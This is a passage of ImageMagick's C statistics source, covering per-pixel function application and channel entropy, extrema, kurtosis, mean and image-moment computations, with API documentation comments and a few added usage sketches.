assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
if (SetImageStorageClass(image,DirectClass) == MagickFalse)
{
InheritException(exception,&image->exception);
return(MagickFalse);
}
status=MagickTrue;
progress=0;
random_info=AcquireRandomInfoThreadSet();
image_view=AcquireAuthenticCacheView(image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
key=GetRandomSecretKey(random_info[0]);
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,image,image->rows,key == ~0UL)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
register IndexPacket
*magick_restrict indexes;
register PixelPacket
*magick_restrict q;
register ssize_t
x;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
indexes=GetCacheViewAuthenticIndexQueue(image_view);
for (x=0; x < (ssize_t) image->columns; x++)
{
MagickRealType
result;
if ((channel & RedChannel) != 0)
{
result=ApplyEvaluateOperator(random_info[id],GetPixelRed(q),op,value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelRed(q,ClampToQuantum(result));
}
if ((channel & GreenChannel) != 0)
{
result=ApplyEvaluateOperator(random_info[id],GetPixelGreen(q),op,
value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelGreen(q,ClampToQuantum(result));
}
if ((channel & BlueChannel) != 0)
{
result=ApplyEvaluateOperator(random_info[id],GetPixelBlue(q),op,
value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelBlue(q,ClampToQuantum(result));
}
if ((channel & OpacityChannel) != 0)
{
if (image->matte == MagickFalse)
{
result=ApplyEvaluateOperator(random_info[id],GetPixelOpacity(q),
op,value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelOpacity(q,ClampToQuantum(result));
}
else
{
result=ApplyEvaluateOperator(random_info[id],GetPixelAlpha(q),
op,value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelAlpha(q,ClampToQuantum(result));
}
}
if (((channel & IndexChannel) != 0) && (indexes != (IndexPacket *) NULL))
{
result=ApplyEvaluateOperator(random_info[id],GetPixelIndex(indexes+x),
op,value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelIndex(indexes+x,ClampToQuantum(result));
}
q++;
}
if (SyncCacheViewAuthenticPixels(image_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,EvaluateImageTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
image_view=DestroyCacheView(image_view);
random_info=DestroyRandomInfoThreadSet(random_info);
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% F u n c t i o n I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% FunctionImage() applies a function, with the given parameters, to each pixel
% of the image. Use these operations to lighten or darken an image, to
% increase or decrease contrast in an image, or to produce the "negative" of
% an image.
%
% The format of the FunctionImageChannel method is:
%
% MagickBooleanType FunctionImage(Image *image,
% const MagickFunction function,const size_t number_parameters,
% const double *parameters,ExceptionInfo *exception)
% MagickBooleanType FunctionImageChannel(Image *image,
% const ChannelType channel,const MagickFunction function,
% const size_t number_parameters,const double *parameters,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o function: A channel function.
%
% o parameters: one or more parameters.
%
% o exception: return any errors or warnings in this structure.
%
*/
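/*
  Usage sketch (added, hedged, not part of the original source): the function
  takes an array of double parameters whose meaning depends on the chosen
  MagickFunction.  Assuming an existing image and exception, the
  four-parameter sinusoid implemented below could be applied as:
    double parameters[4] = { 3.0, 90.0, 0.5, 0.5 };  -- freq, phase, ampl, bias
    (void) FunctionImageChannel(image,CompositeChannels,SinusoidFunction,4,
      parameters,exception);
  Only the signature and the parameter order come from this file; the variable
  names are assumptions.
*/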
static Quantum ApplyFunction(Quantum pixel,const MagickFunction function,
const size_t number_parameters,const double *parameters,
ExceptionInfo *exception)
{
MagickRealType
result;
register ssize_t
i;
(void) exception;
result=0.0;
switch (function)
{
case PolynomialFunction:
{
/*
* Polynomial
* Parameters: polynomial constants, highest to lowest order
* For example: c0*x^3 + c1*x^2 + c2*x + c3
*/
result=0.0;
for (i=0; i < (ssize_t) number_parameters; i++)
result=result*QuantumScale*pixel + parameters[i];
result*=QuantumRange;
break;
}
case SinusoidFunction:
{
/* Sinusoid Function
* Parameters: Freq, Phase, Ampl, bias
*/
double freq,phase,ampl,bias;
freq = ( number_parameters >= 1 ) ? parameters[0] : 1.0;
phase = ( number_parameters >= 2 ) ? parameters[1] : 0.0;
ampl = ( number_parameters >= 3 ) ? parameters[2] : 0.5;
bias = ( number_parameters >= 4 ) ? parameters[3] : 0.5;
result=(MagickRealType) (QuantumRange*(ampl*sin((double) (2.0*MagickPI*
(freq*QuantumScale*pixel + phase/360.0) )) + bias ) );
break;
}
case ArcsinFunction:
{
/* Arcsin Function (pegged at range limits for invalid results)
* Parameters: Width, Center, Range, Bias
*/
double width,range,center,bias;
width = ( number_parameters >= 1 ) ? parameters[0] : 1.0;
center = ( number_parameters >= 2 ) ? parameters[1] : 0.5;
range = ( number_parameters >= 3 ) ? parameters[2] : 1.0;
bias = ( number_parameters >= 4 ) ? parameters[3] : 0.5;
result = 2.0/width*(QuantumScale*pixel - center);
if ( result <= -1.0 )
result = bias - range/2.0;
else if ( result >= 1.0 )
result = bias + range/2.0;
else
result=(MagickRealType) (range/MagickPI*asin((double) result)+bias);
result *= QuantumRange;
break;
}
case ArctanFunction:
{
/* Arctan Function
* Parameters: Slope, Center, Range, Bias
*/
double slope,range,center,bias;
slope = ( number_parameters >= 1 ) ? parameters[0] : 1.0;
center = ( number_parameters >= 2 ) ? parameters[1] : 0.5;
range = ( number_parameters >= 3 ) ? parameters[2] : 1.0;
bias = ( number_parameters >= 4 ) ? parameters[3] : 0.5;
result=(MagickRealType) (MagickPI*slope*(QuantumScale*pixel-center));
result=(MagickRealType) (QuantumRange*(range/MagickPI*atan((double)
result) + bias ) );
break;
}
case UndefinedFunction:
break;
}
return(ClampToQuantum(result));
}
MagickExport MagickBooleanType FunctionImage(Image *image,
const MagickFunction function,const size_t number_parameters,
const double *parameters,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=FunctionImageChannel(image,CompositeChannels,function,
number_parameters,parameters,exception);
return(status);
}
MagickExport MagickBooleanType FunctionImageChannel(Image *image,
const ChannelType channel,const MagickFunction function,
const size_t number_parameters,const double *parameters,
ExceptionInfo *exception)
{
#define FunctionImageTag "Function/Image "
CacheView
*image_view;
MagickBooleanType
status;
MagickOffsetType
progress;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
if (SetImageStorageClass(image,DirectClass) == MagickFalse)
{
InheritException(exception,&image->exception);
return(MagickFalse);
}
#if defined(MAGICKCORE_OPENCL_SUPPORT)
status=AccelerateFunctionImage(image,channel,function,number_parameters,
parameters,exception);
if (status != MagickFalse)
return(status);
#endif
status=MagickTrue;
progress=0;
image_view=AcquireAuthenticCacheView(image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
register IndexPacket
*magick_restrict indexes;
register ssize_t
x;
register PixelPacket
*magick_restrict q;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
indexes=GetCacheViewAuthenticIndexQueue(image_view);
for (x=0; x < (ssize_t) image->columns; x++)
{
if ((channel & RedChannel) != 0)
SetPixelRed(q,ApplyFunction(GetPixelRed(q),function,
number_parameters,parameters,exception));
if ((channel & GreenChannel) != 0)
SetPixelGreen(q,ApplyFunction(GetPixelGreen(q),function,
number_parameters,parameters,exception));
if ((channel & BlueChannel) != 0)
SetPixelBlue(q,ApplyFunction(GetPixelBlue(q),function,
number_parameters,parameters,exception));
if ((channel & OpacityChannel) != 0)
{
if (image->matte == MagickFalse)
SetPixelOpacity(q,ApplyFunction(GetPixelOpacity(q),function,
number_parameters,parameters,exception));
else
SetPixelAlpha(q,ApplyFunction((Quantum) GetPixelAlpha(q),function,
number_parameters,parameters,exception));
}
if (((channel & IndexChannel) != 0) && (indexes != (IndexPacket *) NULL))
SetPixelIndex(indexes+x,ApplyFunction(GetPixelIndex(indexes+x),function,
number_parameters,parameters,exception));
q++;
}
if (SyncCacheViewAuthenticPixels(image_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,FunctionImageTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
image_view=DestroyCacheView(image_view);
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l E n t r o p y %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelEntropy() returns the entropy of one or more image channels.
%
% The format of the GetImageChannelEntropy method is:
%
% MagickBooleanType GetImageChannelEntropy(const Image *image,
% const ChannelType channel,double *entropy,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o entropy: the average entropy of the selected channels.
%
% o exception: return any errors or warnings in this structure.
%
*/
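/*
  Usage sketch (added illustration, not part of the original source): both
  wrappers return the average entropy of the selected channels through an
  out-parameter, so a caller (with image and exception assumed to exist) might
  write:
    double entropy;
    if (GetImageChannelEntropy(image,RedChannel | GreenChannel | BlueChannel,
        &entropy,exception) != MagickFalse)
      (void) fprintf(stdout,"RGB entropy: %g\n",entropy);
*/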
MagickExport MagickBooleanType GetImageEntropy(const Image *image,
double *entropy,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=GetImageChannelEntropy(image,CompositeChannels,entropy,exception);
return(status);
}
MagickExport MagickBooleanType GetImageChannelEntropy(const Image *image,
const ChannelType channel,double *entropy,ExceptionInfo *exception)
{
ChannelStatistics
*channel_statistics;
size_t
channels;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
channel_statistics=GetImageChannelStatistics(image,exception);
if (channel_statistics == (ChannelStatistics *) NULL)
return(MagickFalse);
channels=0;
channel_statistics[CompositeChannels].entropy=0.0;
if ((channel & RedChannel) != 0)
{
channel_statistics[CompositeChannels].entropy+=
channel_statistics[RedChannel].entropy;
channels++;
}
if ((channel & GreenChannel) != 0)
{
channel_statistics[CompositeChannels].entropy+=
channel_statistics[GreenChannel].entropy;
channels++;
}
if ((channel & BlueChannel) != 0)
{
channel_statistics[CompositeChannels].entropy+=
channel_statistics[BlueChannel].entropy;
channels++;
}
if (((channel & OpacityChannel) != 0) && (image->matte != MagickFalse))
{
channel_statistics[CompositeChannels].entropy+=
channel_statistics[OpacityChannel].entropy;
channels++;
}
if (((channel & IndexChannel) != 0) &&
(image->colorspace == CMYKColorspace))
{
channel_statistics[CompositeChannels].entropy+=
channel_statistics[BlackChannel].entropy;
channels++;
}
channel_statistics[CompositeChannels].entropy/=channels;
*entropy=channel_statistics[CompositeChannels].entropy;
channel_statistics=(ChannelStatistics *) RelinquishMagickMemory(
channel_statistics);
return(MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ G e t I m a g e C h a n n e l E x t r e m a %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelExtrema() returns the extrema of one or more image channels.
%
% The format of the GetImageChannelExtrema method is:
%
% MagickBooleanType GetImageChannelExtrema(const Image *image,
% const ChannelType channel,size_t *minima,size_t *maxima,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o minima: the minimum value in the channel.
%
% o maxima: the maximum value in the channel.
%
% o exception: return any errors or warnings in this structure.
%
*/
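/*
  Usage sketch (added, hedged): the extrema are rounded to integral quantum
  values via ceil()/floor() from the floating-point channel range, e.g.
    size_t minima, maxima;
    (void) GetImageChannelExtrema(image,RedChannel,&minima,&maxima,exception);
  where image and exception are assumed to exist already.
*/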
MagickExport MagickBooleanType GetImageExtrema(const Image *image,
size_t *minima,size_t *maxima,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=GetImageChannelExtrema(image,CompositeChannels,minima,maxima,
exception);
return(status);
}
MagickExport MagickBooleanType GetImageChannelExtrema(const Image *image,
const ChannelType channel,size_t *minima,size_t *maxima,
ExceptionInfo *exception)
{
double
max,
min;
MagickBooleanType
status;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
status=GetImageChannelRange(image,channel,&min,&max,exception);
*minima=(size_t) ceil(min-0.5);
*maxima=(size_t) floor(max+0.5);
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l K u r t o s i s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelKurtosis() returns the kurtosis and skewness of one or more
% image channels.
%
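% For example (an illustrative sketch; `image' and `exception' are assumed
% to be valid):
%
% double kurtosis, skewness;
%
% (void) GetImageChannelKurtosis(image,RedChannel,&kurtosis,&skewness,
% exception);
%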
% The format of the GetImageChannelKurtosis method is:
%
% MagickBooleanType GetImageChannelKurtosis(const Image *image,
% const ChannelType channel,double *kurtosis,double *skewness,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o kurtosis: the kurtosis of the channel.
%
% o skewness: the skewness of the channel.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType GetImageKurtosis(const Image *image,
double *kurtosis,double *skewness,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=GetImageChannelKurtosis(image,CompositeChannels,kurtosis,skewness,
exception);
return(status);
}
MagickExport MagickBooleanType GetImageChannelKurtosis(const Image *image,
const ChannelType channel,double *kurtosis,double *skewness,
ExceptionInfo *exception)
{
double
area,
mean,
standard_deviation,
sum_squares,
sum_cubes,
sum_fourth_power;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
*kurtosis=0.0;
*skewness=0.0;
area=0.0;
mean=0.0;
standard_deviation=0.0;
sum_squares=0.0;
sum_cubes=0.0;
sum_fourth_power=0.0;
for (y=0; y < (ssize_t) image->rows; y++)
{
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register ssize_t
x;
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
break;
indexes=GetVirtualIndexQueue(image);
for (x=0; x < (ssize_t) image->columns; x++)
{
if ((channel & RedChannel) != 0)
{
mean+=GetPixelRed(p);
sum_squares+=(double) GetPixelRed(p)*GetPixelRed(p);
sum_cubes+=(double) GetPixelRed(p)*GetPixelRed(p)*GetPixelRed(p);
sum_fourth_power+=(double) GetPixelRed(p)*GetPixelRed(p)*
GetPixelRed(p)*GetPixelRed(p);
area++;
}
if ((channel & GreenChannel) != 0)
{
mean+=GetPixelGreen(p);
sum_squares+=(double) GetPixelGreen(p)*GetPixelGreen(p);
sum_cubes+=(double) GetPixelGreen(p)*GetPixelGreen(p)*
GetPixelGreen(p);
sum_fourth_power+=(double) GetPixelGreen(p)*GetPixelGreen(p)*
GetPixelGreen(p)*GetPixelGreen(p);
area++;
}
if ((channel & BlueChannel) != 0)
{
mean+=GetPixelBlue(p);
sum_squares+=(double) GetPixelBlue(p)*GetPixelBlue(p);
sum_cubes+=(double) GetPixelBlue(p)*GetPixelBlue(p)*GetPixelBlue(p);
sum_fourth_power+=(double) GetPixelBlue(p)*GetPixelBlue(p)*
GetPixelBlue(p)*GetPixelBlue(p);
area++;
}
if ((channel & OpacityChannel) != 0)
{
mean+=GetPixelAlpha(p);
sum_squares+=(double) GetPixelAlpha(p)*GetPixelAlpha(p);
sum_cubes+=(double) GetPixelAlpha(p)*GetPixelAlpha(p)*
GetPixelAlpha(p);
sum_fourth_power+=(double) GetPixelAlpha(p)*GetPixelAlpha(p)*
GetPixelAlpha(p)*GetPixelAlpha(p);
area++;
}
if (((channel & IndexChannel) != 0) &&
(image->colorspace == CMYKColorspace))
{
double
index;
index=(double) GetPixelIndex(indexes+x);
mean+=index;
sum_squares+=index*index;
sum_cubes+=index*index*index;
sum_fourth_power+=index*index*index*index;
area++;
}
p++;
}
}
if (y < (ssize_t) image->rows)
return(MagickFalse);
if (area != 0.0)
{
mean/=area;
sum_squares/=area;
sum_cubes/=area;
sum_fourth_power/=area;
}
standard_deviation=sqrt(sum_squares-(mean*mean));
if (standard_deviation != 0.0)
{
*kurtosis=sum_fourth_power-4.0*mean*sum_cubes+6.0*mean*mean*sum_squares-
3.0*mean*mean*mean*mean;
*kurtosis/=standard_deviation*standard_deviation*standard_deviation*
standard_deviation;
*kurtosis-=3.0;
*skewness=sum_cubes-3.0*mean*sum_squares+2.0*mean*mean*mean;
*skewness/=standard_deviation*standard_deviation*standard_deviation;
}
return(y == (ssize_t) image->rows ? MagickTrue : MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l M e a n %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelMean() returns the mean and standard deviation of one or more
% image channels.
%
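% For example (an illustrative sketch; `image' and `exception' are assumed
% to be valid):
%
% double mean, standard_deviation;
%
% (void) GetImageChannelMean(image,RedChannel,&mean,&standard_deviation,
% exception);
%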
% The format of the GetImageChannelMean method is:
%
% MagickBooleanType GetImageChannelMean(const Image *image,
% const ChannelType channel,double *mean,double *standard_deviation,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o mean: the average value in the channel.
%
% o standard_deviation: the standard deviation of the channel.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType GetImageMean(const Image *image,double *mean,
double *standard_deviation,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=GetImageChannelMean(image,CompositeChannels,mean,standard_deviation,
exception);
return(status);
}
MagickExport MagickBooleanType GetImageChannelMean(const Image *image,
const ChannelType channel,double *mean,double *standard_deviation,
ExceptionInfo *exception)
{
ChannelStatistics
*channel_statistics;
size_t
channels;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
channel_statistics=GetImageChannelStatistics(image,exception);
if (channel_statistics == (ChannelStatistics *) NULL)
return(MagickFalse);
channels=0;
channel_statistics[CompositeChannels].mean=0.0;
channel_statistics[CompositeChannels].standard_deviation=0.0;
if ((channel & RedChannel) != 0)
{
channel_statistics[CompositeChannels].mean+=
channel_statistics[RedChannel].mean;
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[RedChannel].standard_deviation;
channels++;
}
if ((channel & GreenChannel) != 0)
{
channel_statistics[CompositeChannels].mean+=
channel_statistics[GreenChannel].mean;
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[GreenChannel].standard_deviation;
channels++;
}
if ((channel & BlueChannel) != 0)
{
channel_statistics[CompositeChannels].mean+=
channel_statistics[BlueChannel].mean;
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[BlueChannel].standard_deviation;
channels++;
}
if (((channel & OpacityChannel) != 0) && (image->matte != MagickFalse))
{
channel_statistics[CompositeChannels].mean+=
(QuantumRange-channel_statistics[OpacityChannel].mean);
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[OpacityChannel].standard_deviation;
channels++;
}
if (((channel & IndexChannel) != 0) && (image->colorspace == CMYKColorspace))
{
channel_statistics[CompositeChannels].mean+=
channel_statistics[BlackChannel].mean;
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[BlackChannel].standard_deviation;
channels++;
}
channel_statistics[CompositeChannels].mean/=channels;
channel_statistics[CompositeChannels].standard_deviation/=channels;
*mean=channel_statistics[CompositeChannels].mean;
*standard_deviation=channel_statistics[CompositeChannels].standard_deviation;
channel_statistics=(ChannelStatistics *) RelinquishMagickMemory(
channel_statistics);
return(MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l M o m e n t s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelMoments() returns the normalized moments of one or more image
% channels.
%
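% The returned buffer is indexed by channel and must be freed with
% RelinquishMagickMemory().  For example (an illustrative sketch; the
% variable names are assumptions):
%
% ChannelMoments *channel_moments;
% double hu_invariant;
%
% channel_moments=GetImageChannelMoments(image,exception);
% if (channel_moments != (ChannelMoments *) NULL)
% {
% hu_invariant=channel_moments[RedChannel].I[0];
% channel_moments=(ChannelMoments *) RelinquishMagickMemory(channel_moments);
% }
%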
% The format of the GetImageChannelMoments method is:
%
% ChannelMoments *GetImageChannelMoments(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport ChannelMoments *GetImageChannelMoments(const Image *image,
ExceptionInfo *exception)
{
#define MaxNumberImageMoments 8
ChannelMoments
*channel_moments;
double
M00[CompositeChannels+1],
M01[CompositeChannels+1],
M02[CompositeChannels+1],
M03[CompositeChannels+1],
M10[CompositeChannels+1],
M11[CompositeChannels+1],
M12[CompositeChannels+1],
M20[CompositeChannels+1],
M21[CompositeChannels+1],
M22[CompositeChannels+1],
M30[CompositeChannels+1];
MagickPixelPacket
pixel;
PointInfo
centroid[CompositeChannels+1];
ssize_t
channel,
channels,
y;
size_t
length;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
length=CompositeChannels+1UL;
channel_moments=(ChannelMoments *) AcquireQuantumMemory(length,
sizeof(*channel_moments));
if (channel_moments == (ChannelMoments *) NULL)
return(channel_moments);
(void) memset(channel_moments,0,length*sizeof(*channel_moments));
(void) memset(centroid,0,sizeof(centroid));
(void) memset(M00,0,sizeof(M00));
(void) memset(M01,0,sizeof(M01));
(void) memset(M02,0,sizeof(M02));
(void) memset(M03,0,sizeof(M03));
(void) memset(M10,0,sizeof(M10));
(void) memset(M11,0,sizeof(M11));
(void) memset(M12,0,sizeof(M12));
(void) memset(M20,0,sizeof(M20));
(void) memset(M21,0,sizeof(M21));
(void) memset(M22,0,sizeof(M22));
(void) memset(M30,0,sizeof(M30));
GetMagickPixelPacket(image,&pixel);
for (y=0; y < (ssize_t) image->rows; y++)
{
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register ssize_t
x;
/*
Compute center of mass (centroid).
*/
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
break;
indexes=GetVirtualIndexQueue(image);
for (x=0; x < (ssize_t) image->columns; x++)
{
SetMagickPixelPacket(image,p,indexes+x,&pixel);
M00[RedChannel]+=QuantumScale*pixel.red;
M10[RedChannel]+=x*QuantumScale*pixel.red;
M01[RedChannel]+=y*QuantumScale*pixel.red;
M00[GreenChannel]+=QuantumScale*pixel.green;
M10[GreenChannel]+=x*QuantumScale*pixel.green;
M01[GreenChannel]+=y*QuantumScale*pixel.green;
M00[BlueChannel]+=QuantumScale*pixel.blue;
M10[BlueChannel]+=x*QuantumScale*pixel.blue;
M01[BlueChannel]+=y*QuantumScale*pixel.blue;
if (image->matte != MagickFalse)
{
M00[OpacityChannel]+=QuantumScale*pixel.opacity;
M10[OpacityChannel]+=x*QuantumScale*pixel.opacity;
M01[OpacityChannel]+=y*QuantumScale*pixel.opacity;
}
if (image->colorspace == CMYKColorspace)
{
M00[IndexChannel]+=QuantumScale*pixel.index;
M10[IndexChannel]+=x*QuantumScale*pixel.index;
M01[IndexChannel]+=y*QuantumScale*pixel.index;
}
p++;
}
}
for (channel=0; channel <= CompositeChannels; channel++)
{
/*
Compute center of mass (centroid).
*/
if (M00[channel] < MagickEpsilon)
{
M00[channel]+=MagickEpsilon;
centroid[channel].x=(double) image->columns/2.0;
centroid[channel].y=(double) image->rows/2.0;
continue;
}
M00[channel]+=MagickEpsilon;
centroid[channel].x=M10[channel]/M00[channel];
centroid[channel].y=M01[channel]/M00[channel];
}
for (y=0; y < (ssize_t) image->rows; y++)
{
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register ssize_t
x;
/*
Compute the image moments.
*/
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
break;
indexes=GetVirtualIndexQueue(image);
for (x=0; x < (ssize_t) image->columns; x++)
{
SetMagickPixelPacket(image,p,indexes+x,&pixel);
M11[RedChannel]+=(x-centroid[RedChannel].x)*(y-
centroid[RedChannel].y)*QuantumScale*pixel.red;
M20[RedChannel]+=(x-centroid[RedChannel].x)*(x-
centroid[RedChannel].x)*QuantumScale*pixel.red;
M02[RedChannel]+=(y-centroid[RedChannel].y)*(y-
centroid[RedChannel].y)*QuantumScale*pixel.red;
M21[RedChannel]+=(x-centroid[RedChannel].x)*(x-
centroid[RedChannel].x)*(y-centroid[RedChannel].y)*QuantumScale*
pixel.red;
M12[RedChannel]+=(x-centroid[RedChannel].x)*(y-
centroid[RedChannel].y)*(y-centroid[RedChannel].y)*QuantumScale*
pixel.red;
M22[RedChannel]+=(x-centroid[RedChannel].x)*(x-
centroid[RedChannel].x)*(y-centroid[RedChannel].y)*(y-
centroid[RedChannel].y)*QuantumScale*pixel.red;
M30[RedChannel]+=(x-centroid[RedChannel].x)*(x-
centroid[RedChannel].x)*(x-centroid[RedChannel].x)*QuantumScale*
pixel.red;
M03[RedChannel]+=(y-centroid[RedChannel].y)*(y-
centroid[RedChannel].y)*(y-centroid[RedChannel].y)*QuantumScale*
pixel.red;
M11[GreenChannel]+=(x-centroid[GreenChannel].x)*(y-
centroid[GreenChannel].y)*QuantumScale*pixel.green;
M20[GreenChannel]+=(x-centroid[GreenChannel].x)*(x-
centroid[GreenChannel].x)*QuantumScale*pixel.green;
M02[GreenChannel]+=(y-centroid[GreenChannel].y)*(y-
centroid[GreenChannel].y)*QuantumScale*pixel.green;
M21[GreenChannel]+=(x-centroid[GreenChannel].x)*(x-
centroid[GreenChannel].x)*(y-centroid[GreenChannel].y)*QuantumScale*
pixel.green;
M12[GreenChannel]+=(x-centroid[GreenChannel].x)*(y-
centroid[GreenChannel].y)*(y-centroid[GreenChannel].y)*QuantumScale*
pixel.green;
M22[GreenChannel]+=(x-centroid[GreenChannel].x)*(x-
centroid[GreenChannel].x)*(y-centroid[GreenChannel].y)*(y-
centroid[GreenChannel].y)*QuantumScale*pixel.green;
M30[GreenChannel]+=(x-centroid[GreenChannel].x)*(x-
centroid[GreenChannel].x)*(x-centroid[GreenChannel].x)*QuantumScale*
pixel.green;
M03[GreenChannel]+=(y-centroid[GreenChannel].y)*(y-
centroid[GreenChannel].y)*(y-centroid[GreenChannel].y)*QuantumScale*
pixel.green;
M11[BlueChannel]+=(x-centroid[BlueChannel].x)*(y-
centroid[BlueChannel].y)*QuantumScale*pixel.blue;
M20[BlueChannel]+=(x-centroid[BlueChannel].x)*(x-
centroid[BlueChannel].x)*QuantumScale*pixel.blue;
M02[BlueChannel]+=(y-centroid[BlueChannel].y)*(y-
centroid[BlueChannel].y)*QuantumScale*pixel.blue;
M21[BlueChannel]+=(x-centroid[BlueChannel].x)*(x-
centroid[BlueChannel].x)*(y-centroid[BlueChannel].y)*QuantumScale*
pixel.blue;
